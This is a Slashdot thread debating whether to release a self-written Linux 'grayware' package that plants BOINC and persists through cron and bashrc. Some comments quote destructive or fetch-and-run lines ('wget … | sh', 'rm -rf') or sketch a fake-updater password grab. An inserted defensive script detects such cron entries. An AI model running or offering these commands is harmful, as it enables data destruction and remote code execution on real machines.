Ethics of Releasing Non-Malicious Linux Malware?
buchner.johannes writes "I was fed up with the general consensus that Linux is oh-so-secure and has no malware. After a week of work, I finished a package of malware for Unix/Linux. Its whole purpose is to help white-hat hackers point out that a Linux system can be turned into a botnet client by simply downloading BOINC and attaching it to a user account to help scientific projects. The malware does not exploit any security holes, only loose security configurations and mindless execution of unverified downloads. I tested it to be injected by a PHP script (even circumventing safe mode), so that the Web server runs it; I even got a proxy server that injects it into shell scripts and makefiles in tarballs on the fly, and adds onto Windows executables for execution in Wine. If executed by the user, the malware can persist itself in cron, bashrc and other files. The aim of the exercise was to provide a payload so security people can 'pwn' systems to show security holes, without doing harm (such as deleting files or disrupting normal operation). But now I am unsure of whether it is ethically OK to release this toolkit, which, by ripping out the BOINC payload and putting in something really evil, could be turned into proper Linux malware. On the one hand, the way it persists itself in autostart is really nasty, and that is not really a security hole that can be fixed. On the other hand, such a script can be written by anyone else too, and it would be useful to show people why you need SELinux on a server, and why verifying the source of downloads (checksums through trusted channels) is necessary. Technically, it is a nice piece, but should I release it? I don't want to turn the Linux desktop into Windows, hence I'm slightly leaning towards not releasing it. What does your ethics say about releasing such grayware?"
There were two options:
1. Release it anonymously and take no credit
2. Write about it and get some credit (but then you can't actually release it due to legal issues)
You can't (and won't) release it now. If somebody gets attacked with your code, guess who they're going to prosecute and/or sue.
Just releasing Linux is an ethical problem. Hell, I can't even print anything since last Saturday.
Contact someone at SANS, or Bruce Schneier, or some such. Maybe even someone on the SELinux project; if this non-malicious malware is indeed as capable without SELinux as you claim, and SELinux mitigates/eliminates the danger, this could be good PR for them.
.. but sounds like a lot of work to prove a relatively straightforward point.
It's actually been my opinion that Linux in the hands of someone who doesn't know how to use it can in some situations be less secure than windows.
My reasoning for this is that:
1) Newbie Linux users who are having problems with their systems will pretty much run anything as any user you tell them to in a desperate hope to get Xorg working again
2) Linux commands on their own can look very cryptic to the uninitiated.. add into that the scripting abilities of most shells.. and a new Linux user won't be able to differentiate a malicious command from one that will get their nvidia driver working again
3) The out-of-box remote admin abilities of Linux are excellent.
4) Standard tools like nc can easily be used to establish out-connecting remote shell sessions
5) OR you can just get them to wget and execute your favourite piece of malware.
Malware can exist for any platform.
However, real actual malware in the wild requires an eco-system to support it. Proving you can compromise a machine proves nothing. Proving that an ecosystem can actually exist on Linux machines would require completely releasing it into the wild, and subjecting innocent people to it.
I don't know about you, but I know where that falls when it comes to ethics and it ain't on the right side of it.
Wasn't SELinux implicated in part of making the mmap_min_addr root exploit even worse a few months ago? In fact, for one of them, I'm pretty sure that it was the cause of it. Just sayin'.
"My other computer is your Linux box"
Everyone who is paying attention knows there are plenty of hacking tools, bots, worms, and virus-like tools for Linux systems already. The only point to be made would be to the basement-dweller fanboys who are willfully ignorant anyway. So go ahead and release it, but don't expect anyone to applaud you for it.
{fingers in ears} La la la la la la la la la la la la la.......
Why not treat this code like you would any other proof of concept of a security exploit? If the goal is to prove that security vulnerabilities exist and should be fixed, then show this code to whomever it will help actually fix those holes, but try not to release it to the public at large while it still represents a real threat. Show it to package and distribution maintainers and make recommendations on how they can improve their security configurations to prevent it from running, but don't release it as a build-your-own-rootkit tool if it has served its purpose and people are making a serious effort to address the issues it highlights.
I'm glad you're ethical. The millions of exploits for Windows prove that there are people ready to capitalize on any flaw. How long do you think it'll take them to make this malicious? How long do you think it'd take someone smart to engineer the same thing you did with just your explanation here?
This question is posed as if this is new ground. As if this hasn't been done before - without questions of morality and with distinctly less noble intent. All this worry about inserting a malicious payload is wasted. The script kiddies already have better options at their disposal.
Um, reading this, doesn't it require specific software to be installed to be effective? This does not appear, from what little info is presented, to be a general "hackin' tool" to "pwn newbs". Or maybe it is. Let me know when you can actually get into anything with this. As for releasing it: give it to the devs first. Let them patch things up. Then release it after patches are ubiquitous and discuss how clever you are. Anything else is just plain stupid.
Seriously, what is it with people not knowing right from wrong, or accepting responsibility for their own decisions? You're the one who has to sleep with whatever decision you make - why try to foist the blame on someone else if you decide wrong?
That's like one guy who said "My best friends' girlfriend wants to sleep with me - should I do it so I can show him what a sl*t she is?" If you're asking, it's because you want to do it and be able to say "don't blame me - everyone said it was okay !"
BTW - Good luck with whatever you decide, but a lot of us have been in the position of being able to do a lot worse, or been offered $$$ to do a lot worse, and you should be thankful we didn't have to get the group-think thing going before refusing.
Two typos in (what was supposed to be) 19 characters. I wish all malware writers were that sloppy.
Show it to distro developers and repository maintainers, people who do security work, etc. Let them look at it and see if they can defend against it. Don't release it on unsuspecting users, publish the directions to remove it, and defend against it so no one else can do it either. Putting malware in the wild is not the way to get white-hats attention, but it is the way to get black hat's attention. The white hats are usually well behind the black hats with malware that's been released in the wild. Give this to white hats and not black hats.
Post it as security bug against all the distros you've confirmed it works against. That'll attract the attention you want and not the attention you don't.
Perhaps the best action is to write and release these tools:
Tool A: It tells the user he has been compromised. It also saves copies of the files that may be altered.
Tool B: Copies all the old files and MD5s the raw files and the zipped files. (I think that this is hard to make both MD5s fake.)
Tool C: Can replace the corrupted files with the saved copy. It may need a password: if the saved copy can be encrypted with some password so that it is not easily corruptible.
The real problem is not getting compromised, but not being able to verify that it has been compromised and being able to restore it.
Have I missed anything? - A careful user.
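What "Tool B" above amounts to, written out as an added example (this is not code from the thread or from the submitter's package): take a hash baseline of the per-user autostart files the original post says the payload touches (~/.bashrc and friends), re-check it later, and scan a crontab dump for download-and-execute entries. Two assumptions not made by the commenter: SHA-256 is used instead of MD5, because MD5 collisions are cheap to produce, and the baseline file is stored somewhere the unprivileged payload cannot rewrite (root-owned, or on offline media), otherwise the payload can simply re-baseline itself.

```shell
#!/bin/sh
# Added example, not the thread's or the original poster's code.
# Assumptions: coreutils sha256sum is available; the baseline file lives
# where the user-level payload cannot write to it.

# Print the per-user startup files that exist under the given home directory.
persist_files() {
  home="${1:-$HOME}"
  for f in "$home/.bashrc" "$home/.bash_profile" "$home/.profile" \
           "$home/.bash_logout" "$home/.config/autostart"/*.desktop; do
    [ -f "$f" ] && printf '%s\n' "$f"
  done
  return 0
}

# Write "<sha256>  <path>" for every file named on stdin into baseline $1.
make_baseline() {
  out="$1"
  : > "$out"
  while IFS= read -r f; do
    [ -f "$f" ] && sha256sum -- "$f" >> "$out"
  done
  return 0
}

# Re-hash every file listed in baseline $1. Print each file that changed or
# disappeared; return 1 if any differ, 0 if everything still matches.
check_baseline() {
  baseline="$1"
  changed=0
  while read -r sum f; do
    cur=$(sha256sum -- "$f" 2>/dev/null | cut -d' ' -f1)
    if [ "$cur" != "$sum" ]; then
      echo "CHANGED OR MISSING: $f"
      changed=1
    fi
  done < "$baseline"
  return "$changed"
}

# Read a crontab (e.g. the output of `crontab -l`) on stdin and print entries
# that fetch something with wget/curl and pipe it into a shell, or that run a
# .sh file out of a hidden directory. Heuristic only; exits 0 either way.
suspicious_cron_lines() {
  grep -E '(wget|curl)[^|]*[|][[:space:]]*(ba)?sh|/\.[A-Za-z0-9_-]+/.*\.sh' || true
}

# Usage:
#   persist_files > /root/user-baseline.txt      # once, while the account is known clean
#   check_baseline /root/user-baseline.txt       # later; non-zero status means something changed
#   crontab -l | suspicious_cron_lines
```

This only covers user-writable persistence, which is all the submitter claims his payload uses; a root-level rootkit would also have to be checked from a trusted boot medium, since it can lie to `sha256sum` running on the compromised system.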
I love
I'm fed up with the general consensus that people are able to walk around outside without being punched in the face. After all, anyone can be punched in the face at any time, so I've been thinking about going up to random people on the street and punching them in the face. People need to learn to take reasonable steps to protect themselves from being punched in the face, such as wearing full-face motorcycle helmets at all times, and how are they going to learn that if I don't show them? But now I'm having second thoughts about whether or not it would be ethical to go around randomly punching people in the face. Does anyone have any advice?
Release it and do the same with OS X shortly thereafter.
Any programmer worth a grain of salt could write the same thing at the drop of a hat. I don't understand where it would be all that interesting.
Which simply shows that the lack of Linux malware isn't because Linux is somehow magically superior, but simply because nobody has taken the time to write any.
Even better, pretty soon we'll have clueless noobs with their new netbooks running Google's ChromeOS (which they don't know is really Linux because Google is doing everything they can to avoid the "L" word). Now they can get pwned too!!
I was fed up with the general consensus that Linux is oh-so-secure and has no malware.
Just because it's a consensus doesn't mean it's correct. As you have demonstrated, it's very much possible to write malware targeted at Linux.
In fact, there are plenty of viruses and malware specifically targeted at Linux, and their numbers are rising: http://www.internetnews.com/dev-news/article.php/3601946
However, because desktop Linux has an extremely small market share, malware for Linux has a correspondingly tiny market share.
Think of it this way: a few weeks ago you woke up and came up with the idea of writing a piece of potential malware directed at Linux. But there are a hundred who woke up with the same idea, except they wanted to target Windows. In the end, 101 new pieces of malware are born, with only one of them intended to harm Linux systems.
As you said in your own post, compromising a Linux box isn't impossible. The code you have isn't all that revolutionary, it's just a demo. Anybody with actual malicious intent would likely know how to make a program like this themselves. Another option would be to set up the system on your server but not release the source; you could demonstrate the weaknesses of *nix without putting anybody in any real danger.
Get in touch with the security community as some other poster said.
Then concentrate on releasing a paper about your software. If your techniques are good, they might be an interesting read. Even more important is that if your software does not escalate privileges (as I understand), cleaning your software should be a straightforward job from the superuser account. Those cleaning techniques will probably be even more interesting.
I'd use a rather obvious payload that reveals itself when interrogated (instead of BOINC) in order to be useful for evaluating system security.
I don't think your malware is as nasty as you think, as you said you relied on executing downloaded software in a world with signed repositories and with MD5 hashes/PGP signatures as a normal custom. I also think you're underestimating the difference between the administrator-all-the-time Windows way and the only-escalate-when-needed model of the Unix world. It would be interesting to see what happens, though.
That's like one guy who said "My best friends' girlfriend wants to sleep with me - should I do it so I can show him what a sl*t she is?"
Of course, why actually sleep with her when you can just brag about her offer on slashdot!
The claim is that a PHP injection on a web server is going to also infect user-owned tarballs and wine executables and root-owned shell scripts without exploiting a privilege escalation hole? Either his webserver is configured to run as root, or this claim doesn't pass the smell test.
I'm sure there are some people in the computer security world who you admire. So ask yourself, what would these people do if they had discovered the exploits? What would Phil Zimmermann, or DJB do? Some of these people were unhappy with the current situation, and took their own road and created some good, secure software.
Also, maybe your code isn't as good as you claim. Or maybe it mostly uses known exploits. It's time for a reality check. You should try to find some peers, and discuss it with them to determine how dangerous your product really is.
We already know how to break into systems with buffer and heap overflows. We know how to do SQL injection into not-so-smart applications. If you work at it you can break into almost anything.
Absolutely no good purpose is served providing a toolkit that allows people to break into naively configured systems. Much of what you describe is akin to leaving the keys in your Maserati with the doors unlocked and the engine running. Please don't make things easier for joyriding teenagers.
If a site wants to know if they're secure, within the current limits of our knowledge, they can perform their own audits, and hire their own advisers to test their systems in a controlled fashion.
Applications, such as BOINC, have an unknown state of security review or audit. I doubt they applied the coding guidelines of CERT, or any of the Common Criteria levels. An administrator would only deploy such applications in the DMZ of their network. To call a Linux system, or Windoze system, secure means you've evaluated the risk of both the operating system and the applications on that system and decided it is good enough for you.
to CERN or some other security group, or to White Hat Hackers who won't release it or use it, but study it and find a way around it.
I would pass it on to some Linux kernel and Linux OS developers, and see if they can fix the security holes you found that allow the hacking of Linux.
If you release it into the public for anyone to download, dollars to doughnuts some idiot is going to replace the BOINC client with a packet sniffer or key logger or something else. It is like inventing a rocket or missile and then someone takes it, steals your design, and then places a WMD in the warhead and launches them at public areas. Just like we wouldn't want technology leaked to Iran, Cuba, Syria, Sudan, North Korea, and other places that could use it for better missiles, guidance systems, encryption, etc., some cyber terrorists would use your code for espionage on some Linux web servers run by governments and the military because they thought Linux would be more secure than Windows.
I'll help you out, just send it in a tarball to me, and I'll verify if it works or not. Oh, I'm sure you want to keep it opensource and all, so just put the source in there too... I'll make sure your given proper credit. Thanks. :)
yeah, in all its capitalized glory, that was my opinion right on the title. why so? because there will be time for that, there is enough crappy stuff floating on the intertubes as to release a 'toolkit' that allows to add the whole world of linux servers to the fotm botnet
Well, in general, if you petition a large number of others for advice on a decision you're not sure of, you'll probably be less likely to do something stupid. After all, the general public has a low but well-known level of intelligence, and as an individual you may be stupider than that yourself.
Why does everyone suddenly think he means it's going to be targeted randomly on the internet and he will break into people's computers?
It's only an example of code that could be created by malicious persons. Purpose is to show people that there is stupid "Linux is 100% secure" thinking among UNIX users and that security needs to be improved there too (or admins should run something like SELinux).
Of course he isn't going to spread it around and attack peoples computers, because that would be illegal. He's just asking if it's a good thing to release such an example.
Yeah, really! Ethics is easy!
Will releasing it make you money? No? Then don't do it.
See how easy that was?
Security through obscurity isn't. Publish.
Since, despite the popular belief, the idea of a grey/black/white hacker being distinct solely because of intent is, at best, a falsity, the idea that one could release something with the potential of being as destructive as TFS claims is a no-brainer.
The answer is no. Under no circumstances should the package be released.
Because, to release the code is no different than saying "I only illegally accessed your systems, Mr. FBI, to show you how it could be done. I am an honest little boy/girl".
Its whole purpose is to help white-hat hackers point out that a Linux system can be turned into a botnet client
It would be nice to see the code. As it stands, I am surprised that this "news" made it this far, with no links of any kind.
No one credible claims that malware is impossible in GNU/Linux or *BSD. In fact, since UNIX is a much more robust networking OS, maintaining a botnet should be a helluva lot easier than on Windows. What we have with a free OS, though, is something that proprietary OS users will never have: complete and total control over our security policy and every other aspect of our software environment. When and if a vector is identified, our security policy will promptly change to nip it in the bud.
A Speculative Example
Lately I've been thinking about one major vector: the human-assisted privilege escalation. Take the latest Ubuntu and imagine a piece of software which runs with user privileges and does the following: it tricks the user into thinking that it is the automatic updater. Lacking in both expertise and time, I am not going to do a proof of concept, but how hard can it be? You just need to draw a window named "Update Manager" using the standard Gnome API, list a few bogus updates anyone would find legit, with version numbers irrelevant to their day-to-day life (e.g. binutils), wait for the user to click [Install Updates], and then "gksu pwn_you.sh". The user will enter the password, and your work is done. Then, of course, you still need to draw some progress bars to lull the user into believing that an update is going on, but that's all just icing on the cake.
If anyone can see why this won't work, I would like to hear it.
Looks scary, right? Wrong. Because the solution is as simple as changing the default policy. Make it so that the default behavior is to notify only. On every system update the user should be told: "Go start the updater via the system menu. By the way, if you EVER see an "updater" you didn't start yourself, you are being pwned." Make sure that the system menu is strictly read-only, and even the dimmest user will be safe.
This won't be implemented in Windows. Why? I really cannot guess why Microsoft's security policy seems to be designed from ground up to fuck the user, but it is. The usual excuse seems to be: "it's easy to use". But whatever is the reason, you just cannot make a proprietary platform secure because you cannot pop the hood open. With a free OS, you can.
Post it to the internet with a headline of "Nude Pictures of Brittany Spears!! (Linux only)." Oh, and give it a payload that allows you to pwn the computers it gets downloaded to. And then you'll have a Linux botnet!! How cool is that!!
And, next time somebody posts on /. "imagine a beowulf cluster of those" -- well, you'll actually have a beowulf cluster of those.
Oh, and I almost forgot:
3. ???
4. profit!!
Too bad I've already commented on this thread, or I'd mod that up.
But I'll also say that my mother runs Fedora 11, and the SELinux configuration is a lot better than in previous Fedora releases. The SELinux reports are all related to config files in her home directory, and those are carried over from previous Fedora installs. From what I can see, someone got a clue and cleaned up the general Fedora SELinux configuration in a big way.
It's only an example of code that could be created by malicious persons.
Yes that's correct, the question he is asking basically is "should I educate, &/or provide tools to, malicious persons which will enable them to do this in order to prove my point."
Purpose is to show people that there is stupid "Linux is 100% secure" thinking among UNIX users and that security needs to be improved there too (or admins should run something like SELinux).
Yes. All he has to do is balance the good done by showing how stupid some Linux users are against the bad done by enabling malware creation. Which is what he's asking us, collectively, to do for him.
Who modded this funny? It's insightful, if anything.
What you are contemplating doing is roughly, the digital-electronic equivalent of supplying criminals with maps of wealthy communities, marked with what areas are and are not guarded, where valuables are kept, etc. Don't think that simply because you didn't write a truly malicious payload, that by letting others use a tool you can and should reasonably know will be used for evil purposes you don't share in the culpability, ethically if not legally, even if you don't pull the trigger yourself. ~Hal
Insecurity through stupidity is a common problem on Linux. The Ubuntu forums are full of users wailing that their machines got hacked after they installed FTP, SSH or VNC with a kewl four letter password. One could argue that it is not the users, but rather the Ubuntu developers that are stupid by not configuring PAM to enforce password complexity by default, since it is not really a flaw in 'Linux' per se, but it could certainly be considered to be a dumb-ass flaw in the Ubuntu distribution.
The exploit relies on "loose execution of unverified downloads"...
Is this the joke about the virus that spreads itself by telling the user "send this email to all your friends then format your hard drive" ?
Once you have code executed on a machine that doesn't have good security, you manage to get local root exploit and then do some "really nasty thing" to persist a reboot?
Please?
Really nasty as in escaping offline IDS?
Publish your kiddie exploit, I'm laughing out loud...
: )
We Linux geeks won't censor you or sue you or something. We're not MS.
It's not a hazard. It's a benefit. We understand.
Sounds like you have too much time on your hands. Linux and Unix boxes get rooted and kitted all the time, from various security holes in PHP, SQLi, etc. Writing some "greyhat malware" package doesn't really demonstrate anything. It's a well known fact that *nix is still vulnerable to attack, and I really see no relevance to what you're doing. Besides, anyone who runs a locked down system and has any degree of paranoia wouldn't run SETI@Home, Distributed.net or any other similar distributed client software. OSSEC would pick this jazz up in half a second. Congratulations on some questionable bash scripting.
Security through obscurity does not work. If you can write a program there is at least one much less ethical person out there willing to do it as well. The fact we don't see it suggests that people are not motivated or see a benefit in doing it. I suspect much won't happen if you release it. I realize it might also be the case that it is going unreported. Either way it will get developers motivated to fix the issues. See Microsoft for example. So that when Linux becomes a major OS and people will want to freak the systems they will have a much harder time.
>mindless execution of unverified downloads
There is no cure for stupid on any platform.
People will install purple gorillas and cd-drive-cupholders. This is not new.
But beyond user stupidity, there are reasons why propagation of badware on Linux and Unix sucks, and I suggest that people read Tom's excellent rant here: http://slashdot.org/comments.pl?sid=3291&cid=1395315
This situation may not last (cf. sudo silliness on Fedora), but unless you can do a miracle of social engineering, treachery, and underhandedness and get your badware included in the main repositories as source (which repo maintainers and end users use to build packages), you're not going to get very far in the *nix world.
Thank you. You two nailed it.
I don't know...we do a lot of stuff as a collective already, more of it the more "advanced" we are.
If you can truly spread this as easy as possible, then do so. But put a payload into it that closes all the holes it slips through. Proof of concept achieved, morals remain intact.
I have a strong suspicion that this whole "question" is merely an attempt by Windows marketdroids to spread one of their favorite FUD formulas: "Linux is not really secure, it's just too unpopular to be targeted by malware writers". Please note how often it is mentioned in otherwise content-free comments.
There is no actual "malware". All author claims is that he wrote something that demonstrates the fact that a program executed on a Linux box by a user has that user's access privileges and can do stuff that the user does not expect or like. That's at best a trojan horse -- without capability to gain superuser privileges or compromise other users or hosts, such "malware" is firmly in the range of stupid pranks -- slightly below changing someone's wallpaper to goatse and slightly above asking someone to check out the Last Measure web site. It has nothing to do with millions-strong botnets and hours-to-worldwide-pandemic worms that make Windows such a great platform for crooks and vandals.
What it all boils down to is marketshare. I deal with malware from all ends of the spectrum, and the entire purpose of modern malware is usually one thing: to make money. Whether that be by using that machine in a botnet, stealing banking or other logon info, or by trying to get someone to pay for fake security software, malware has turned into (within the last decade) a major business. Due to lack of enforcement, these things mainly stem from countries with little oversight (African countries, Russia, tiny islands etc.) and are hard to take down. The reason Linux has not been mass targeted is that it normally represents the higher end of the user spectrum, whereas Windows is the low hanging fruit. Take international pickpockets or muggers. The offenders will find the most vulnerable target who is unaware of their surroundings and unable to defend themselves. Windows is a 60 year old lady in a foreign market with her passport and wallet around her neck wearing bright pink taking pictures and not paying attention. Linux is more like an aware person who has made themselves a hard target just by knowing what not to do. Macs seem to be the exception for the moment, and this is where I actually happen to see a huge potential for this to change though. More and more, instead of the family tech having to support a family Windows box, it is simply easier to just tell a novice to get a Mac. Once this reaches a certain apex, that is when malware will target it. Just about any system can be compromised, but back to my original point: is it worth it (money?)
I work with AS400 and iSeries machines (and I accept your collective condolences). When I first got trained on them, the teachers told us that OS400 has never been hacked. Not having any real data to confront them, I just let it pass. When we covered the section about user ids and passwords, I found out that 400's force you to disable a user id and password after a certain, finite number of logon attempts. This was by design. All user ids, including system administrator ids, had to have some number (I forget how high you can set it) of illegal attempts before the id is locked out. (Usually this is set to 3.) They explained, smugly, that this was to keep out intruders.
We further learned that user id's could not be set to more than 10 characters. So I raised my hand and asked what happened if all the user accounts got disabled. They said that IBM would have to back door their way in to unlock a system administrator account, and from that account, others could be reset. (This would be BAD and time consuming, so it was good practice to keep a few SYSADMIN accounts around just in case) I asked if they had ever heard of a denial of service attack. Of course they said. So I asked the obvious question, "What if someone wrote a script to log on to every 10 digit user account 3 times with a blank password?" The reply was "Why would anyone do THAT?"
I pointed out that while I couldn't "hack" their system by their definitions, I could sure as heck turn it into a boat anchor, and do it remotely if it was hooked to the Internet... "Yes, but you can't HACK it was the reply..."
If you are worried about the legal implications, why don't you just present and release it as something like 'automated remote boinc installer'. At that point, it is the decision of the end user whether to use it for its original purpose, or change it for their own purpose (be it legal or illegal). Make sure to release it under a good license that releases you of liability. Do not release it as 'Linux malware', or you probably will get pinned for it.
Yeah, really! Ethics is easy!
Will releasing it make you money? No? Then don't do it.
See how easy that was?
No, no, no. Ethics cannot be based on money because money is only a means to an end not an end in itself. We must fall back on the ethical basis nature gives us as anything else is artificial.
Will it get you laid?
Will it enhance the ability of your children to get laid?
If yes, then you are morally obligated to do it.
... is that after a Linux developer writes malware, he/she contributes it to the community. When a Windows developer creates malware, he/she uses it immediately for fun or profit.
Well, in general, if you petition a large number of others for advice on a decision you're not sure of, you'll probably be less likely to do something stupid.
After all, the general public has a low but well-known level of intelligence, and as an individual you may be stupider than that yourself.
Average IQ is 100
Hopefully, IQ is higher on /.
Would you be so kind as to open a terminal window mr user and run this for me so that you can join
my cool bot net.
wget www.somewhere.com/somefile.sh -O - | sh
Oh no what will the community do, I may have just released a very serious malware exploit vector.
Got Code?
Then comment your code to that effect.
If you release it, you had better release it under the GPL, or it really will be an unethical release...
I don't like Linux. This doesn't make me a troll.
Malicious ware? How can something be non-malicious malicious ware? Doesn't that contradict itself? And how is releasing something that does something to someone's computer without their consent considered a good thing?
That's right- I feel smarter just being here.
Let's put it another way. Even if I left my house door wide open, opened all the windows, etc., it still does not give you the right to come in and f*ck with my house.
It doesn't give anyone the right to come tamper with your house.
However, if they walk in a door you opened, they haven't "broken in".
They're just trespassing (possibly); hopefully you don't have a doormat that says "Welcome", "Come In", or something such as that.
If you do, then w/ the door held open: you've invited them in.
Non-malicious malware.... Dudware?
Political correctness is really just herd psychology pushed by insecure people who desperately seek social conformity.
Unless you are saying we are all born with an innate ability to determine if all possible actions are right and wrong, and thus also say that all possible actions do in fact have a single, unequivocal answer to the question "Is this right?". If you are saying all of that, sure you are right.
However, if you aren't, then there is good use in discussing ethical issues. If we are finite beings incapable of omnipotence, then admitting that we don't know the answer ourselves is a fairly intelligent act compared to flipping a coin. There may be options that one doesn't see on their own, that are far better and will be thought up through intelligent discussion.
You might also really want to talk to a lawyer who knows the Computer Fraud and Abuse Act. At a minimum, you may need to worry about 18 USC 1030(a)(5). Pay attention to the definition of "damage" and "loss" in 18 USC 1030(e)(8),(11).
If it's for-profit but free, you're not the customer -- you're the product (e.g., the Slashdot Beta's "audience").
Linux malware that requires manual running is trivially easy to do.
Copy and paste: sudo rm -rf
Enter your password
Come back when you have malware that can remotely infect a target machine without user interaction.
I say release the ideas, or at least document the concepts with pseudocode so that the average skript kiddie can't just download and modify - they'd at least need to spend the time implementing it in some language.
This way, people qualified to fix the problem can review your proof of concept and fix the problem, but you're limiting the exposure to the average bored 15 year old whose skill set doesn't extend too far beyond downloading a .c file and running gcc.
I run: Windows, OS X, Linux, FreeBSD. Just because you have a hammer, doesn't mean everything is a nail.
No malware? I think the claim is that Linux doesn't have the threat from viruses that Windows does - actually, it has little threat from them at all.
loose security configurations and mindless execution of unverified downloads - so, the sort of thing no admin with any brains, regardless the OS they were using, would do? The difference is, you can fairly much lock up Linux very fast, with little a non-privileged person can do, while not really limiting what services the machine will offer. With Windows on the other hand, it takes more effort to lock it down, and things become far more burdensome to deal with once you do. Let me tell you how much I loved having errors all over the policy editor in windows because of some basic security settings...which meant that doing normal, everyday windows admin tasks you would be confronted with errors left and right because of the policy settings. Doing normal, everyday UNIX admin tasks on a locked down box though...no issues.
Why do people take the argument so damn personally, anyway? The OSes are meant for different things. That one is better at some things than the other should make sense - they have entirely different methodologies.
PS - it took you a *week* to write something that could exploit "loose security configurations?" Give me 5 minutes and I'll write something. Go ahead and publish whatever you wrote, I'm sure several of us could use the laugh.
You should be BOINC'ing your hot friends, not their computers!
War as we knew it was obsolete
Nothing could beat complete denial
- Emily Haines
Open source it, that way we can all contribute to the malware and discuss if it should use gtk or qt. We know that gnome users will refuse to install anything with qt dependencies and kde users will refuse to install gtk+ dependencies. None of the windows malware coders are willing to release their code to us, so we are limited on integration, especially with wifi. I personally think we should target gnome users, they like stepping on people -- just look at how condescending their logo is. Plus I have a grudge against the way they put their contributers down. Once we get enough malwared machines we can convince windows malware coders to support our platform.
Trying to install linux on my microwave, but keep getting a kernel panic...
"IQ is higher on /."
And more to the point: Hopefully the average intelligence is higher on /.
So you're saying that a group of people, none of which have an innate ability to determine right from wrong, come to better ethical decisions than an individual with the same limitation?
I think you meant "UI through obscurity".
So don't release it. Pretty straight forward if you ask me.
I still can't believe Parkay's not butter.
Will it get you laid?
Will it enhance the ability of your children to get laid?
If yes, then you are morally obligated to do it.
"There is no 'right' or 'wrong', 'good' or 'evil'. There is only 'historically correlated with collective survival'."
More seriously, wouldn't that position mean that all birth control is evil (IIRC this actually matches what the roman catholics believe (but obviously for different reasons), plus there's "every sperm is sacred, every sperm is great, when a sperm is wasted god gets quite irate") and that the only proper response when a potential partner wants to use a condom is to secretly poke a hole in it? Somehow, that seems a bit off...
And the person that pulls the trigger not the gun.
Is your Internet Throttled? Install DD-Wrt, OpenWRT or Tomato to learn the truth! Google: 1Gbps/1Gbps: 5 Communities
And if they didn't, I don't think your "malware" is going to destroy the Linux community, on the contrary. So go ahead.
Dear
Negative. Unless I specifically give permission then you still cannot enter. What is so effing hard about that concept for people to grasp?
It could do more damage:
Boinc is built on voluntary use, meaning a group of people who voluntarily join, making their tiny cpu cycles contribute to a greater goal.
This malware would force someone to join, which is a bit like forcing someone to do charity work: it's commendable, but only if you really want to do it, otherwise it's abuse.
If you had boinc mysteriously appear on your pc, I'm sure you would remove it, and many who would have met boinc in better circumstances would now never install it anymore.
Slipping shoelaces ?
Negative. Unless I specifically give permission then you still cannot enter.
Surely implied permission will suffice in certain circumstances.
Better to be despised for too anxious apprehensions, than ruined by too confident a security. --Edmund Burke
... Consider the 'Rick Astley' iPhone semi-malware released last month that affected jailbroken iPhones.
Someone's now put a deadlier payload on the same code.
Linux has two main things over Windows:
First one is that people can't accidentally execute some random program they downloaded with their browser. They have to intentionally save it somewhere, chmod +x, then run it. There's no "ok, ok, ok, yes I am stupid" sequence of warning dialog button selections that's going to do that, so it takes very intentional actions to run some random code you got from the web.
The second one is that Linux users don't, as a normal thing, run random programs they downloaded from the web. They generally install packages provided by their distribution. If a Linux user needs a RAR compressor they don't go hunt it around the web, possibly landing on a page offering a trojaned version, they "apt-get install" their distribution's verified version.
The first means people are very unlikely to run your code by accident, the second that you have to provide a good reason to run your malicious code.
I think that all this really proves is that if you really insist on running untrusted code on your system it can go and screw with your system (or user account). Well, duh. The question isn't whether it can happen at all, it's how easily it can happen by accident or lack of attention. If the user really insists on shooting their foot there's little anybody can do about that.
But, suppose that Linux got lots of stupid desktop users, who'd download fluffy_kittens.sh and actually go through the steps they need to run it. In that case distributions could add some extra security quite easily, by for instance denying the user the ability to run programs from non-root owned directories (grsecurity does this). This would make it so that even if the user does download your script, sets the permissions, and tries to run it, it will fail to work anyway.
Now of course there's the ld.so workaround, but that's not going to happen from the GUI, and the distribution could always patch their ld.so to obey the grsecurity restrictions.
Given all this, IMO, this exercise proves very little. It proves that if you manage to convince the user to intentionally run untrusted code, it'll be able to do nasty things. But this is a given on any system that's not locked down in a really fascist manner. It'll take a cell phone-like environment with sandboxed applications to defeat that. And even there applications must be allowed to do potentially harmful things to be able to do some entirely legitimate functions.
At that point you have two possibilities: you completely refuse to run unsigned code (pissing off the user), or ask the user "do you want to let this program delete all your data?" and allow them to shoot their own foot.
There is no implied permission to enter private property, only explicit.
That is the exact opposite of what I was taught at Law School.
It's an obvious lie. Nobody here has a friend with a girlfriend.
IANAL doesn't apply to you then? Wow, I thought it applied to everyone on slashdot.
You are entitled to your own opinions, not your own facts.
It's not a complex concept. It's just a factually incorrect one.
Uhh, no, it's retarded and was modded funny as a result. Security through obscurity has been debunked dozens of times. Mac OS for instance is pretty visible, but yet seems to have not even a fraction of the problems another major commercial OS does. And don't tell me there isn't a major bonus for being the hacker to really pwn OS X. I'm sure as a Windows troll you would give a nut for this kind of exploit just to prove this lame claim. Vista and W7 are a HUGE step forward, but don't pretend that the only reason everybody else is safe and Windows is a spyware dungeon is just based on marketshare.
This is an important milestone in the Linux to the Desktop campaign.
Without a "healthy malware ecosystem", Linux isn't mature enough to be called a desktop operation system.
Think about the AV industry!
Patents Drive Free Software as Hurricanes Drive Construction Industry
Only if you lied to the police and told them that the person broke in, but you will definitely have to provide more an explanation than that.
Or they refused to leave when you told them to.
The police certainly won't do anything to them unless you actually reported an incident, and made certain representations (which could be true or not, however lying to the police: possibly an even more severe crime than trespass).
They could show the marketing materials, pamphlets, they were carrying, and the police would not arrest them, once it became clear that they were indeed a salesman trying to get your attention, who happened to walk in an open door (due to the implicit invitation).
You might even have a case if you caught them rummaging in your pantry -- as that suggests an intent to convert some of your property (even if just a small snack).
However, simply walking through an open door, is no crime, when there is implicit invitation involved.
In fact, at many homes... there will be a mostly enclosed screen porch, and it's necessary to pass through an open door just to ring the bell.
However, if they walk in a door you opened, they haven't "broken in".
Actually... they have. "Breaking and entering" apparently doesn't require any actual breaking. Of course, if you explicitly opened the door and held it for them, that's implied permission to enter. But if they just left their door open and you wandered in, they can be charged with breaking and entering.
Rampant carbon sequestration destroyed the Dinosaurs' tropical paradise. I'm here to help repair the damage.
I've always thought it was hard enough to get apps and services I do want to install and get going on linx that some random piece of malware has no chance.
Install and Run Instructions: ./LinuxMalware1.0.exe.sh
==================
chmod a+x ./LinuxMalware1.0.exe.sh
su -c "./LinuxMalware1.0.exe.sh"
Script
==========
#!/bin/bash
rm -rf
exit 0
The Point
=============
If you are running things from an untrusted source then you are a dumb-ass.
